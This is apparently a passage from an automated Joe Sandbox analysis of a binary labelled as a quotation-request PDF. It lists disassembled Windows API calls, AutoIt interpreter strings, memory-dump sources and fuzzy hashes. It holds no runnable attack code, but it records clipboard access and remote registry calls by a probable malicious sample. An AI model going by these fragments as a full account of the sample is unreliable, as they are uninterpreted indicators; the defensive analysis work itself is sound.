                                                                    • DestroyWindow.USER32(?), ref: 004590F2
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004591AF
                                                                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 004591EF
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 00459200
                                                                    • CreateWindowExW.USER32(00000008,AutoIt v3,00000000,?,88C00000,?,?,?,00000001,?,00000000,00000000), ref: 00459242
                                                                    • GetClientRect.USER32(00000000,?), ref: 0045924E
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,?,50000000,?,00000004,00000500,00000018,?,00000000,00000000), ref: 00459290
                                                                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004592A2
                                                                    • GetStockObject.GDI32(00000011), ref: 004592AC
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 004592B4
                                                                    • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004592C4
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004592CD
                                                                    • DeleteDC.GDI32(00000000), ref: 004592D6
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 0045931C
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00459334
                                                                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,?,00000000,00000000,00000000), ref: 0045936E
                                                                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00459382
                                                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00459393
                                                                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,?,00000000,00000000,00000000), ref: 004593C8
                                                                    • GetStockObject.GDI32(00000011), ref: 004593D3
                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 004593E3
                                                                    • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004593EE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                    • API String ID: 2910397461-517079104
                                                                    • Opcode ID: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                    • Instruction ID: c5562805fc82c6770b180505aab83e69ed0b4cba248239bed49a3b83ebf26fc7
                                                                    • Opcode Fuzzy Hash: 7a94e82ab5e7eba8c21ff2ad013f2909889a905bd0bc04285d9267b4528ddb10
                                                                    • Instruction Fuzzy Hash: 71A18371B40214BFEB14DF64CD8AFAE7769AB44711F208529FB05BB2D1D6B4AD00CB68
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsnicmp
                                                                    • String ID: #NoAutoIt3Execute$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#requireadmin$Cannot parse #include$Unterminated group of comments
                                                                    • API String ID: 1038674560-3360698832
                                                                    • Opcode ID: 7534ac369bce7e38ff114bad5cf0846739f07f60f75e82906ed6ff2ebc51d02e
                                                                    • Instruction ID: 9c7d50a5cd0ee83047e92bfb3361563e61671b380f2e7b4b5fccf758bfaba57c
                                                                    • Opcode Fuzzy Hash: 7534ac369bce7e38ff114bad5cf0846739f07f60f75e82906ed6ff2ebc51d02e
                                                                    • Instruction Fuzzy Hash: B5610670701621B7D711AE219C42FAF335C9F50705F50442BFE05AA286FB7DEE8686AE
                                                                    APIs
                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 00430754
                                                                    • SetCursor.USER32(00000000), ref: 0043075B
                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 0043076C
                                                                    • SetCursor.USER32(00000000), ref: 00430773
                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00430784
                                                                    • SetCursor.USER32(00000000), ref: 0043078B
                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 0043079C
                                                                    • SetCursor.USER32(00000000), ref: 004307A3
                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 004307B4
                                                                    • SetCursor.USER32(00000000), ref: 004307BB
                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 004307CC
                                                                    • SetCursor.USER32(00000000), ref: 004307D3
                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 004307E4
                                                                    • SetCursor.USER32(00000000), ref: 004307EB
                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 004307FC
                                                                    • SetCursor.USER32(00000000), ref: 00430803
                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00430814
                                                                    • SetCursor.USER32(00000000), ref: 0043081B
                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0043082C
                                                                    • SetCursor.USER32(00000000), ref: 00430833
                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00430844
                                                                    • SetCursor.USER32(00000000), ref: 0043084B
                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 0043085C
                                                                    • SetCursor.USER32(00000000), ref: 00430863
                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00430874
                                                                    • SetCursor.USER32(00000000), ref: 0043087B
                                                                    • SetCursor.USER32(00000000), ref: 00430887
                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00430898
                                                                    • SetCursor.USER32(00000000), ref: 0043089F
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Cursor$Load
                                                                    • String ID:
                                                                    • API String ID: 1675784387-0
                                                                    • Opcode ID: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                    • Instruction ID: ada3a8d1d263842f4cf6b5ed80e179871947c4c62c163598e9ab22da256eac1d
                                                                    • Opcode Fuzzy Hash: c7473186da6a924b3206e1e01d9541ab2871430d40d1833d6e341d2f3415b8bd
                                                                    • Instruction Fuzzy Hash: AF3101729C8205B7EA546BE0BE1DF5D3618AB28727F004836F309B54D09AF551509B6D
                                                                    APIs
                                                                    • GetSysColor.USER32(0000000E), ref: 00430913
                                                                    • SetTextColor.GDI32(?,00000000), ref: 0043091B
                                                                    • GetSysColor.USER32(00000012), ref: 00430933
                                                                    • SetTextColor.GDI32(?,?), ref: 0043093B
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 0043094E
                                                                    • GetSysColor.USER32(0000000F), ref: 00430959
                                                                    • CreateSolidBrush.GDI32(?), ref: 00430962
                                                                    • GetSysColor.USER32(00000011), ref: 00430979
                                                                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0043098B
                                                                    • SelectObject.GDI32(?,00000000), ref: 0043099C
                                                                    • SetBkColor.GDI32(?,?), ref: 004309A6
                                                                    • SelectObject.GDI32(?,?), ref: 004309B4
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 004309D9
                                                                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 004309F4
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00430A09
                                                                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00430A29
                                                                    • GetWindowTextW.USER32(00000000,00000000,?), ref: 00430A5A
                                                                    • InflateRect.USER32(?,000000FD,000000FD), ref: 00430A86
                                                                    • DrawFocusRect.USER32(?,?), ref: 00430A91
                                                                    • GetSysColor.USER32(00000011), ref: 00430A9F
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00430AA7
                                                                    • DrawTextW.USER32(?,?,000000FF,?,00000105), ref: 00430ABC
                                                                    • SelectObject.GDI32(?,?), ref: 00430AD0
                                                                    • DeleteObject.GDI32(00000105), ref: 00430ADC
                                                                    • SelectObject.GDI32(?,?), ref: 00430AE3
                                                                    • DeleteObject.GDI32(?), ref: 00430AE9
                                                                    • SetTextColor.GDI32(?,?), ref: 00430AF0
                                                                    • SetBkColor.GDI32(?,?), ref: 00430AFB
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Color$ObjectText$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 1582027408-0
                                                                    • Opcode ID: 5d65719131e179a9f74a9095f7d89cc9a0806716ec67b872349150954db9c409
                                                                    • Instruction ID: b12033eb3fa9204049de4d7caedd8dcf025edfa44633034d6aae7949f8ecba99
                                                                    • Opcode Fuzzy Hash: 5d65719131e179a9f74a9095f7d89cc9a0806716ec67b872349150954db9c409
                                                                    • Instruction Fuzzy Hash: 6F713071900209BFDB04DFA8DD88EAEBBB9FF48710F104619F915A7290D774A941CFA8
                                                                    APIs
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046BAE6
                                                                    • RegCreateKeyExW.ADVAPI32(?,?,00000000,00484EA8,00000000,?,00000000,?,?,?), ref: 0046BB40
                                                                    • RegCloseKey.ADVAPI32(?,00000001,00000000,00000000,00000000), ref: 0046BB8A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: CloseConnectCreateRegistry
                                                                    • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                    • API String ID: 3217815495-966354055
                                                                    • Opcode ID: 144d0bb69c17a5380bae361c8772a2c4dadfb7b41544130593d4324b44590eb2
                                                                    • Instruction ID: 14c723365299aea1e32a80c9e2d98689f85295d348ed372ee81e16963ac3f886
                                                                    • Opcode Fuzzy Hash: 144d0bb69c17a5380bae361c8772a2c4dadfb7b41544130593d4324b44590eb2
                                                                    • Instruction Fuzzy Hash: BCE18171604200ABD710EF65C885F1BB7E8EF88704F14895EB949DB352D739ED41CBA9
                                                                    APIs
                                                                    • GetCursorPos.USER32(?), ref: 004566AE
                                                                    • GetDesktopWindow.USER32 ref: 004566C3
                                                                    • GetWindowRect.USER32(00000000), ref: 004566CA
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456722
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456735
                                                                    • DestroyWindow.USER32(?), ref: 00456746
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00456794
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,0000002C), ref: 004567B2
                                                                    • SendMessageW.USER32(?,00000418,00000000,?), ref: 004567C6
                                                                    • SendMessageW.USER32(?,00000439,00000000,0000002C), ref: 004567D6
                                                                    • SendMessageW.USER32(?,00000421,?,?), ref: 004567F6
                                                                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 0045680C
                                                                    • IsWindowVisible.USER32(?), ref: 0045682C
                                                                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00456848
                                                                    • SendMessageW.USER32(?,00000411,00000001,0000002C), ref: 0045685C
                                                                    • GetWindowRect.USER32(?,?), ref: 00456873
                                                                    • MonitorFromPoint.USER32(?,00000001,00000002), ref: 00456891
                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 004568A9
                                                                    • CopyRect.USER32(?,?), ref: 004568BE
                                                                    • SendMessageW.USER32(?,00000412,00000000), ref: 00456914
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSendWindow$Rect$LongMonitor$CopyCreateCursorDesktopDestroyFromInfoPointVisible
                                                                    • String ID: ($,$tooltips_class32
                                                                    • API String ID: 225202481-3320066284
                                                                    • Opcode ID: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                    • Instruction ID: fcdb4dd5bfb9c4cfeeadc9569793f3eee26ed74f2078e1bfb0220ba6a1b85fea
                                                                    • Opcode Fuzzy Hash: d36279d6046af7916fa8cb53b873a9c87cdaa8c87180e7b1c59dea88ca998a74
                                                                    • Instruction Fuzzy Hash: 4CB17170A00205AFDB54DFA4CD85BAEB7B4BF48304F10895DE919BB282D778A949CB58
                                                                    APIs
                                                                    • OpenClipboard.USER32(?), ref: 0046DCE7
                                                                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 0046DCF5
                                                                    • GetClipboardData.USER32(0000000D), ref: 0046DD01
                                                                    • CloseClipboard.USER32 ref: 0046DD0D
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0046DD37
                                                                    • CloseClipboard.USER32 ref: 0046DD41
                                                                    • IsClipboardFormatAvailable.USER32(00000001), ref: 0046DD81
                                                                    • GetClipboardData.USER32(00000001), ref: 0046DD8D
                                                                    • CloseClipboard.USER32 ref: 0046DD99
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                                    • String ID:
                                                                    • API String ID: 15083398-0
                                                                    • Opcode ID: c1334997229f77db4b11d19c1487f326394a263a26d39f21c0988453c07de84a
                                                                    • Instruction ID: c6f05cb0c77453757aa6b00544986da50a17ac1627668c5aecb5782462309948
                                                                    • Opcode Fuzzy Hash: c1334997229f77db4b11d19c1487f326394a263a26d39f21c0988453c07de84a
                                                                    • Instruction Fuzzy Hash: CE81B072704201ABD310EF65DD8AB5EB7A8FF94315F00482EF605E72D1EB74E905879A
                                                                    APIs
                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                    • GetWindowRect.USER32(?,?), ref: 00471CF7
                                                                    • GetClientRect.USER32(?,?), ref: 00471D05
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D0D
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471D20
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471D42
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471D71
                                                                    • GetSystemMetrics.USER32(00000007), ref: 00471D79
                                                                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00471DA3
                                                                    • GetSystemMetrics.USER32(00000008), ref: 00471DAB
                                                                    • GetSystemMetrics.USER32(00000004), ref: 00471DCF
                                                                    • SetRect.USER32(?,00000000,00000000,?,?), ref: 00471DEE
                                                                    • AdjustWindowRectEx.USER32(?,?,00000000,00000040), ref: 00471DFF
                                                                    • CreateWindowExW.USER32(00000040,AutoIt v3 GUI,?,?,?,?,?,?,?,00000000,00400000,00000000), ref: 00471E35
                                                                    • SetWindowLongW.USER32(00000000,000000EB,?), ref: 00471E6E
                                                                    • GetClientRect.USER32(?,?), ref: 00471E8A
                                                                    • GetStockObject.GDI32(00000011), ref: 00471EA6
                                                                    • SendMessageW.USER32(?,00000030,00000000), ref: 00471EB2
                                                                    • SetTimer.USER32(00000000,00000000,00000028,00462986), ref: 00471ED9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: System$Metrics$Rect$Window$ClientInfoParameters$AdjustCreateLongMessageObjectSendStockTimer_malloc
                                                                    • String ID: @$AutoIt v3 GUI
                                                                    • API String ID: 867697134-3359773793
                                                                    • Opcode ID: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                                    • Instruction ID: 8cf5fd9e7b0abf2f472dad9b41bae804ea9cb1b32c1b51d65689880f1cfe2d6c
                                                                    • Opcode Fuzzy Hash: f09f2a2b6cca380f9ede19f0122a88a3538efa9583e86f2b72b74e79f194809b
                                                                    • Instruction Fuzzy Hash: 7DC17F71A402059FDB14DFA8DD85BAF77B4FB58714F10862EFA09A7290DB78A840CB58
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue__wcsicoll_wcscpy_wcslen_wcsncpy
                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                    • API String ID: 1503153545-1459072770
                                                                    • Opcode ID: 652e9956a2c061bcacba314d71e92089feb5c798af4b022cd26fa76e4b483538
                                                                    • Instruction ID: bf9a9138137c8e48d15734b0b0bf1383f69a7efb75f9ce998fc77f2ad016157b
                                                                    • Opcode Fuzzy Hash: 652e9956a2c061bcacba314d71e92089feb5c798af4b022cd26fa76e4b483538
                                                                    • Instruction Fuzzy Hash: D551F672A402043BD610BB269C43EFFB36C9F49715F10055FFE09A6242EA7DEA5183AD
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID: __wcsicoll$__wcsnicmp
                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:$pQH
                                                                    • API String ID: 790654849-32604322
                                                                    • Opcode ID: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                    • Instruction ID: c91e69f26a1c2718e03151092e39642ccf44f92bf630fd0466772f198d10bc2a
                                                                    • Opcode Fuzzy Hash: 29d435e902b015a153743909057decd258383f7606cc46ad0233eead686698a2
                                                                    • Instruction Fuzzy Hash: CA317731A0420966DB10FAA2DD46BAE736C9F15315F20053BBD00BB2D5E7BC6E4587AE
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300606091.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_2_2_400000_Quotation request -30112024_pdf.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ec4818a70940714241ac62ce087eb5378cc8c67a5392bddd4fb75b5668bfa7cd
                                                                    • Instruction ID: 62dae473257cc2caee0a49c5626d46440081d624880130feb25903cd50123649
                                                                    • Opcode Fuzzy Hash: ec4818a70940714241ac62ce087eb5378cc8c67a5392bddd4fb75b5668bfa7cd
                                                                    • Instruction Fuzzy Hash: 84C128727002046BE724CFA8DC46FAFB7A4EF55311F00416AFA05DA2C1EBB99909C795
                                                                    APIs
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004487BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000002.00000002.1300430383.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000002.00000002.1300412122.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300492263.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300519320.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300540141.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000002.00000002.1300560025.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
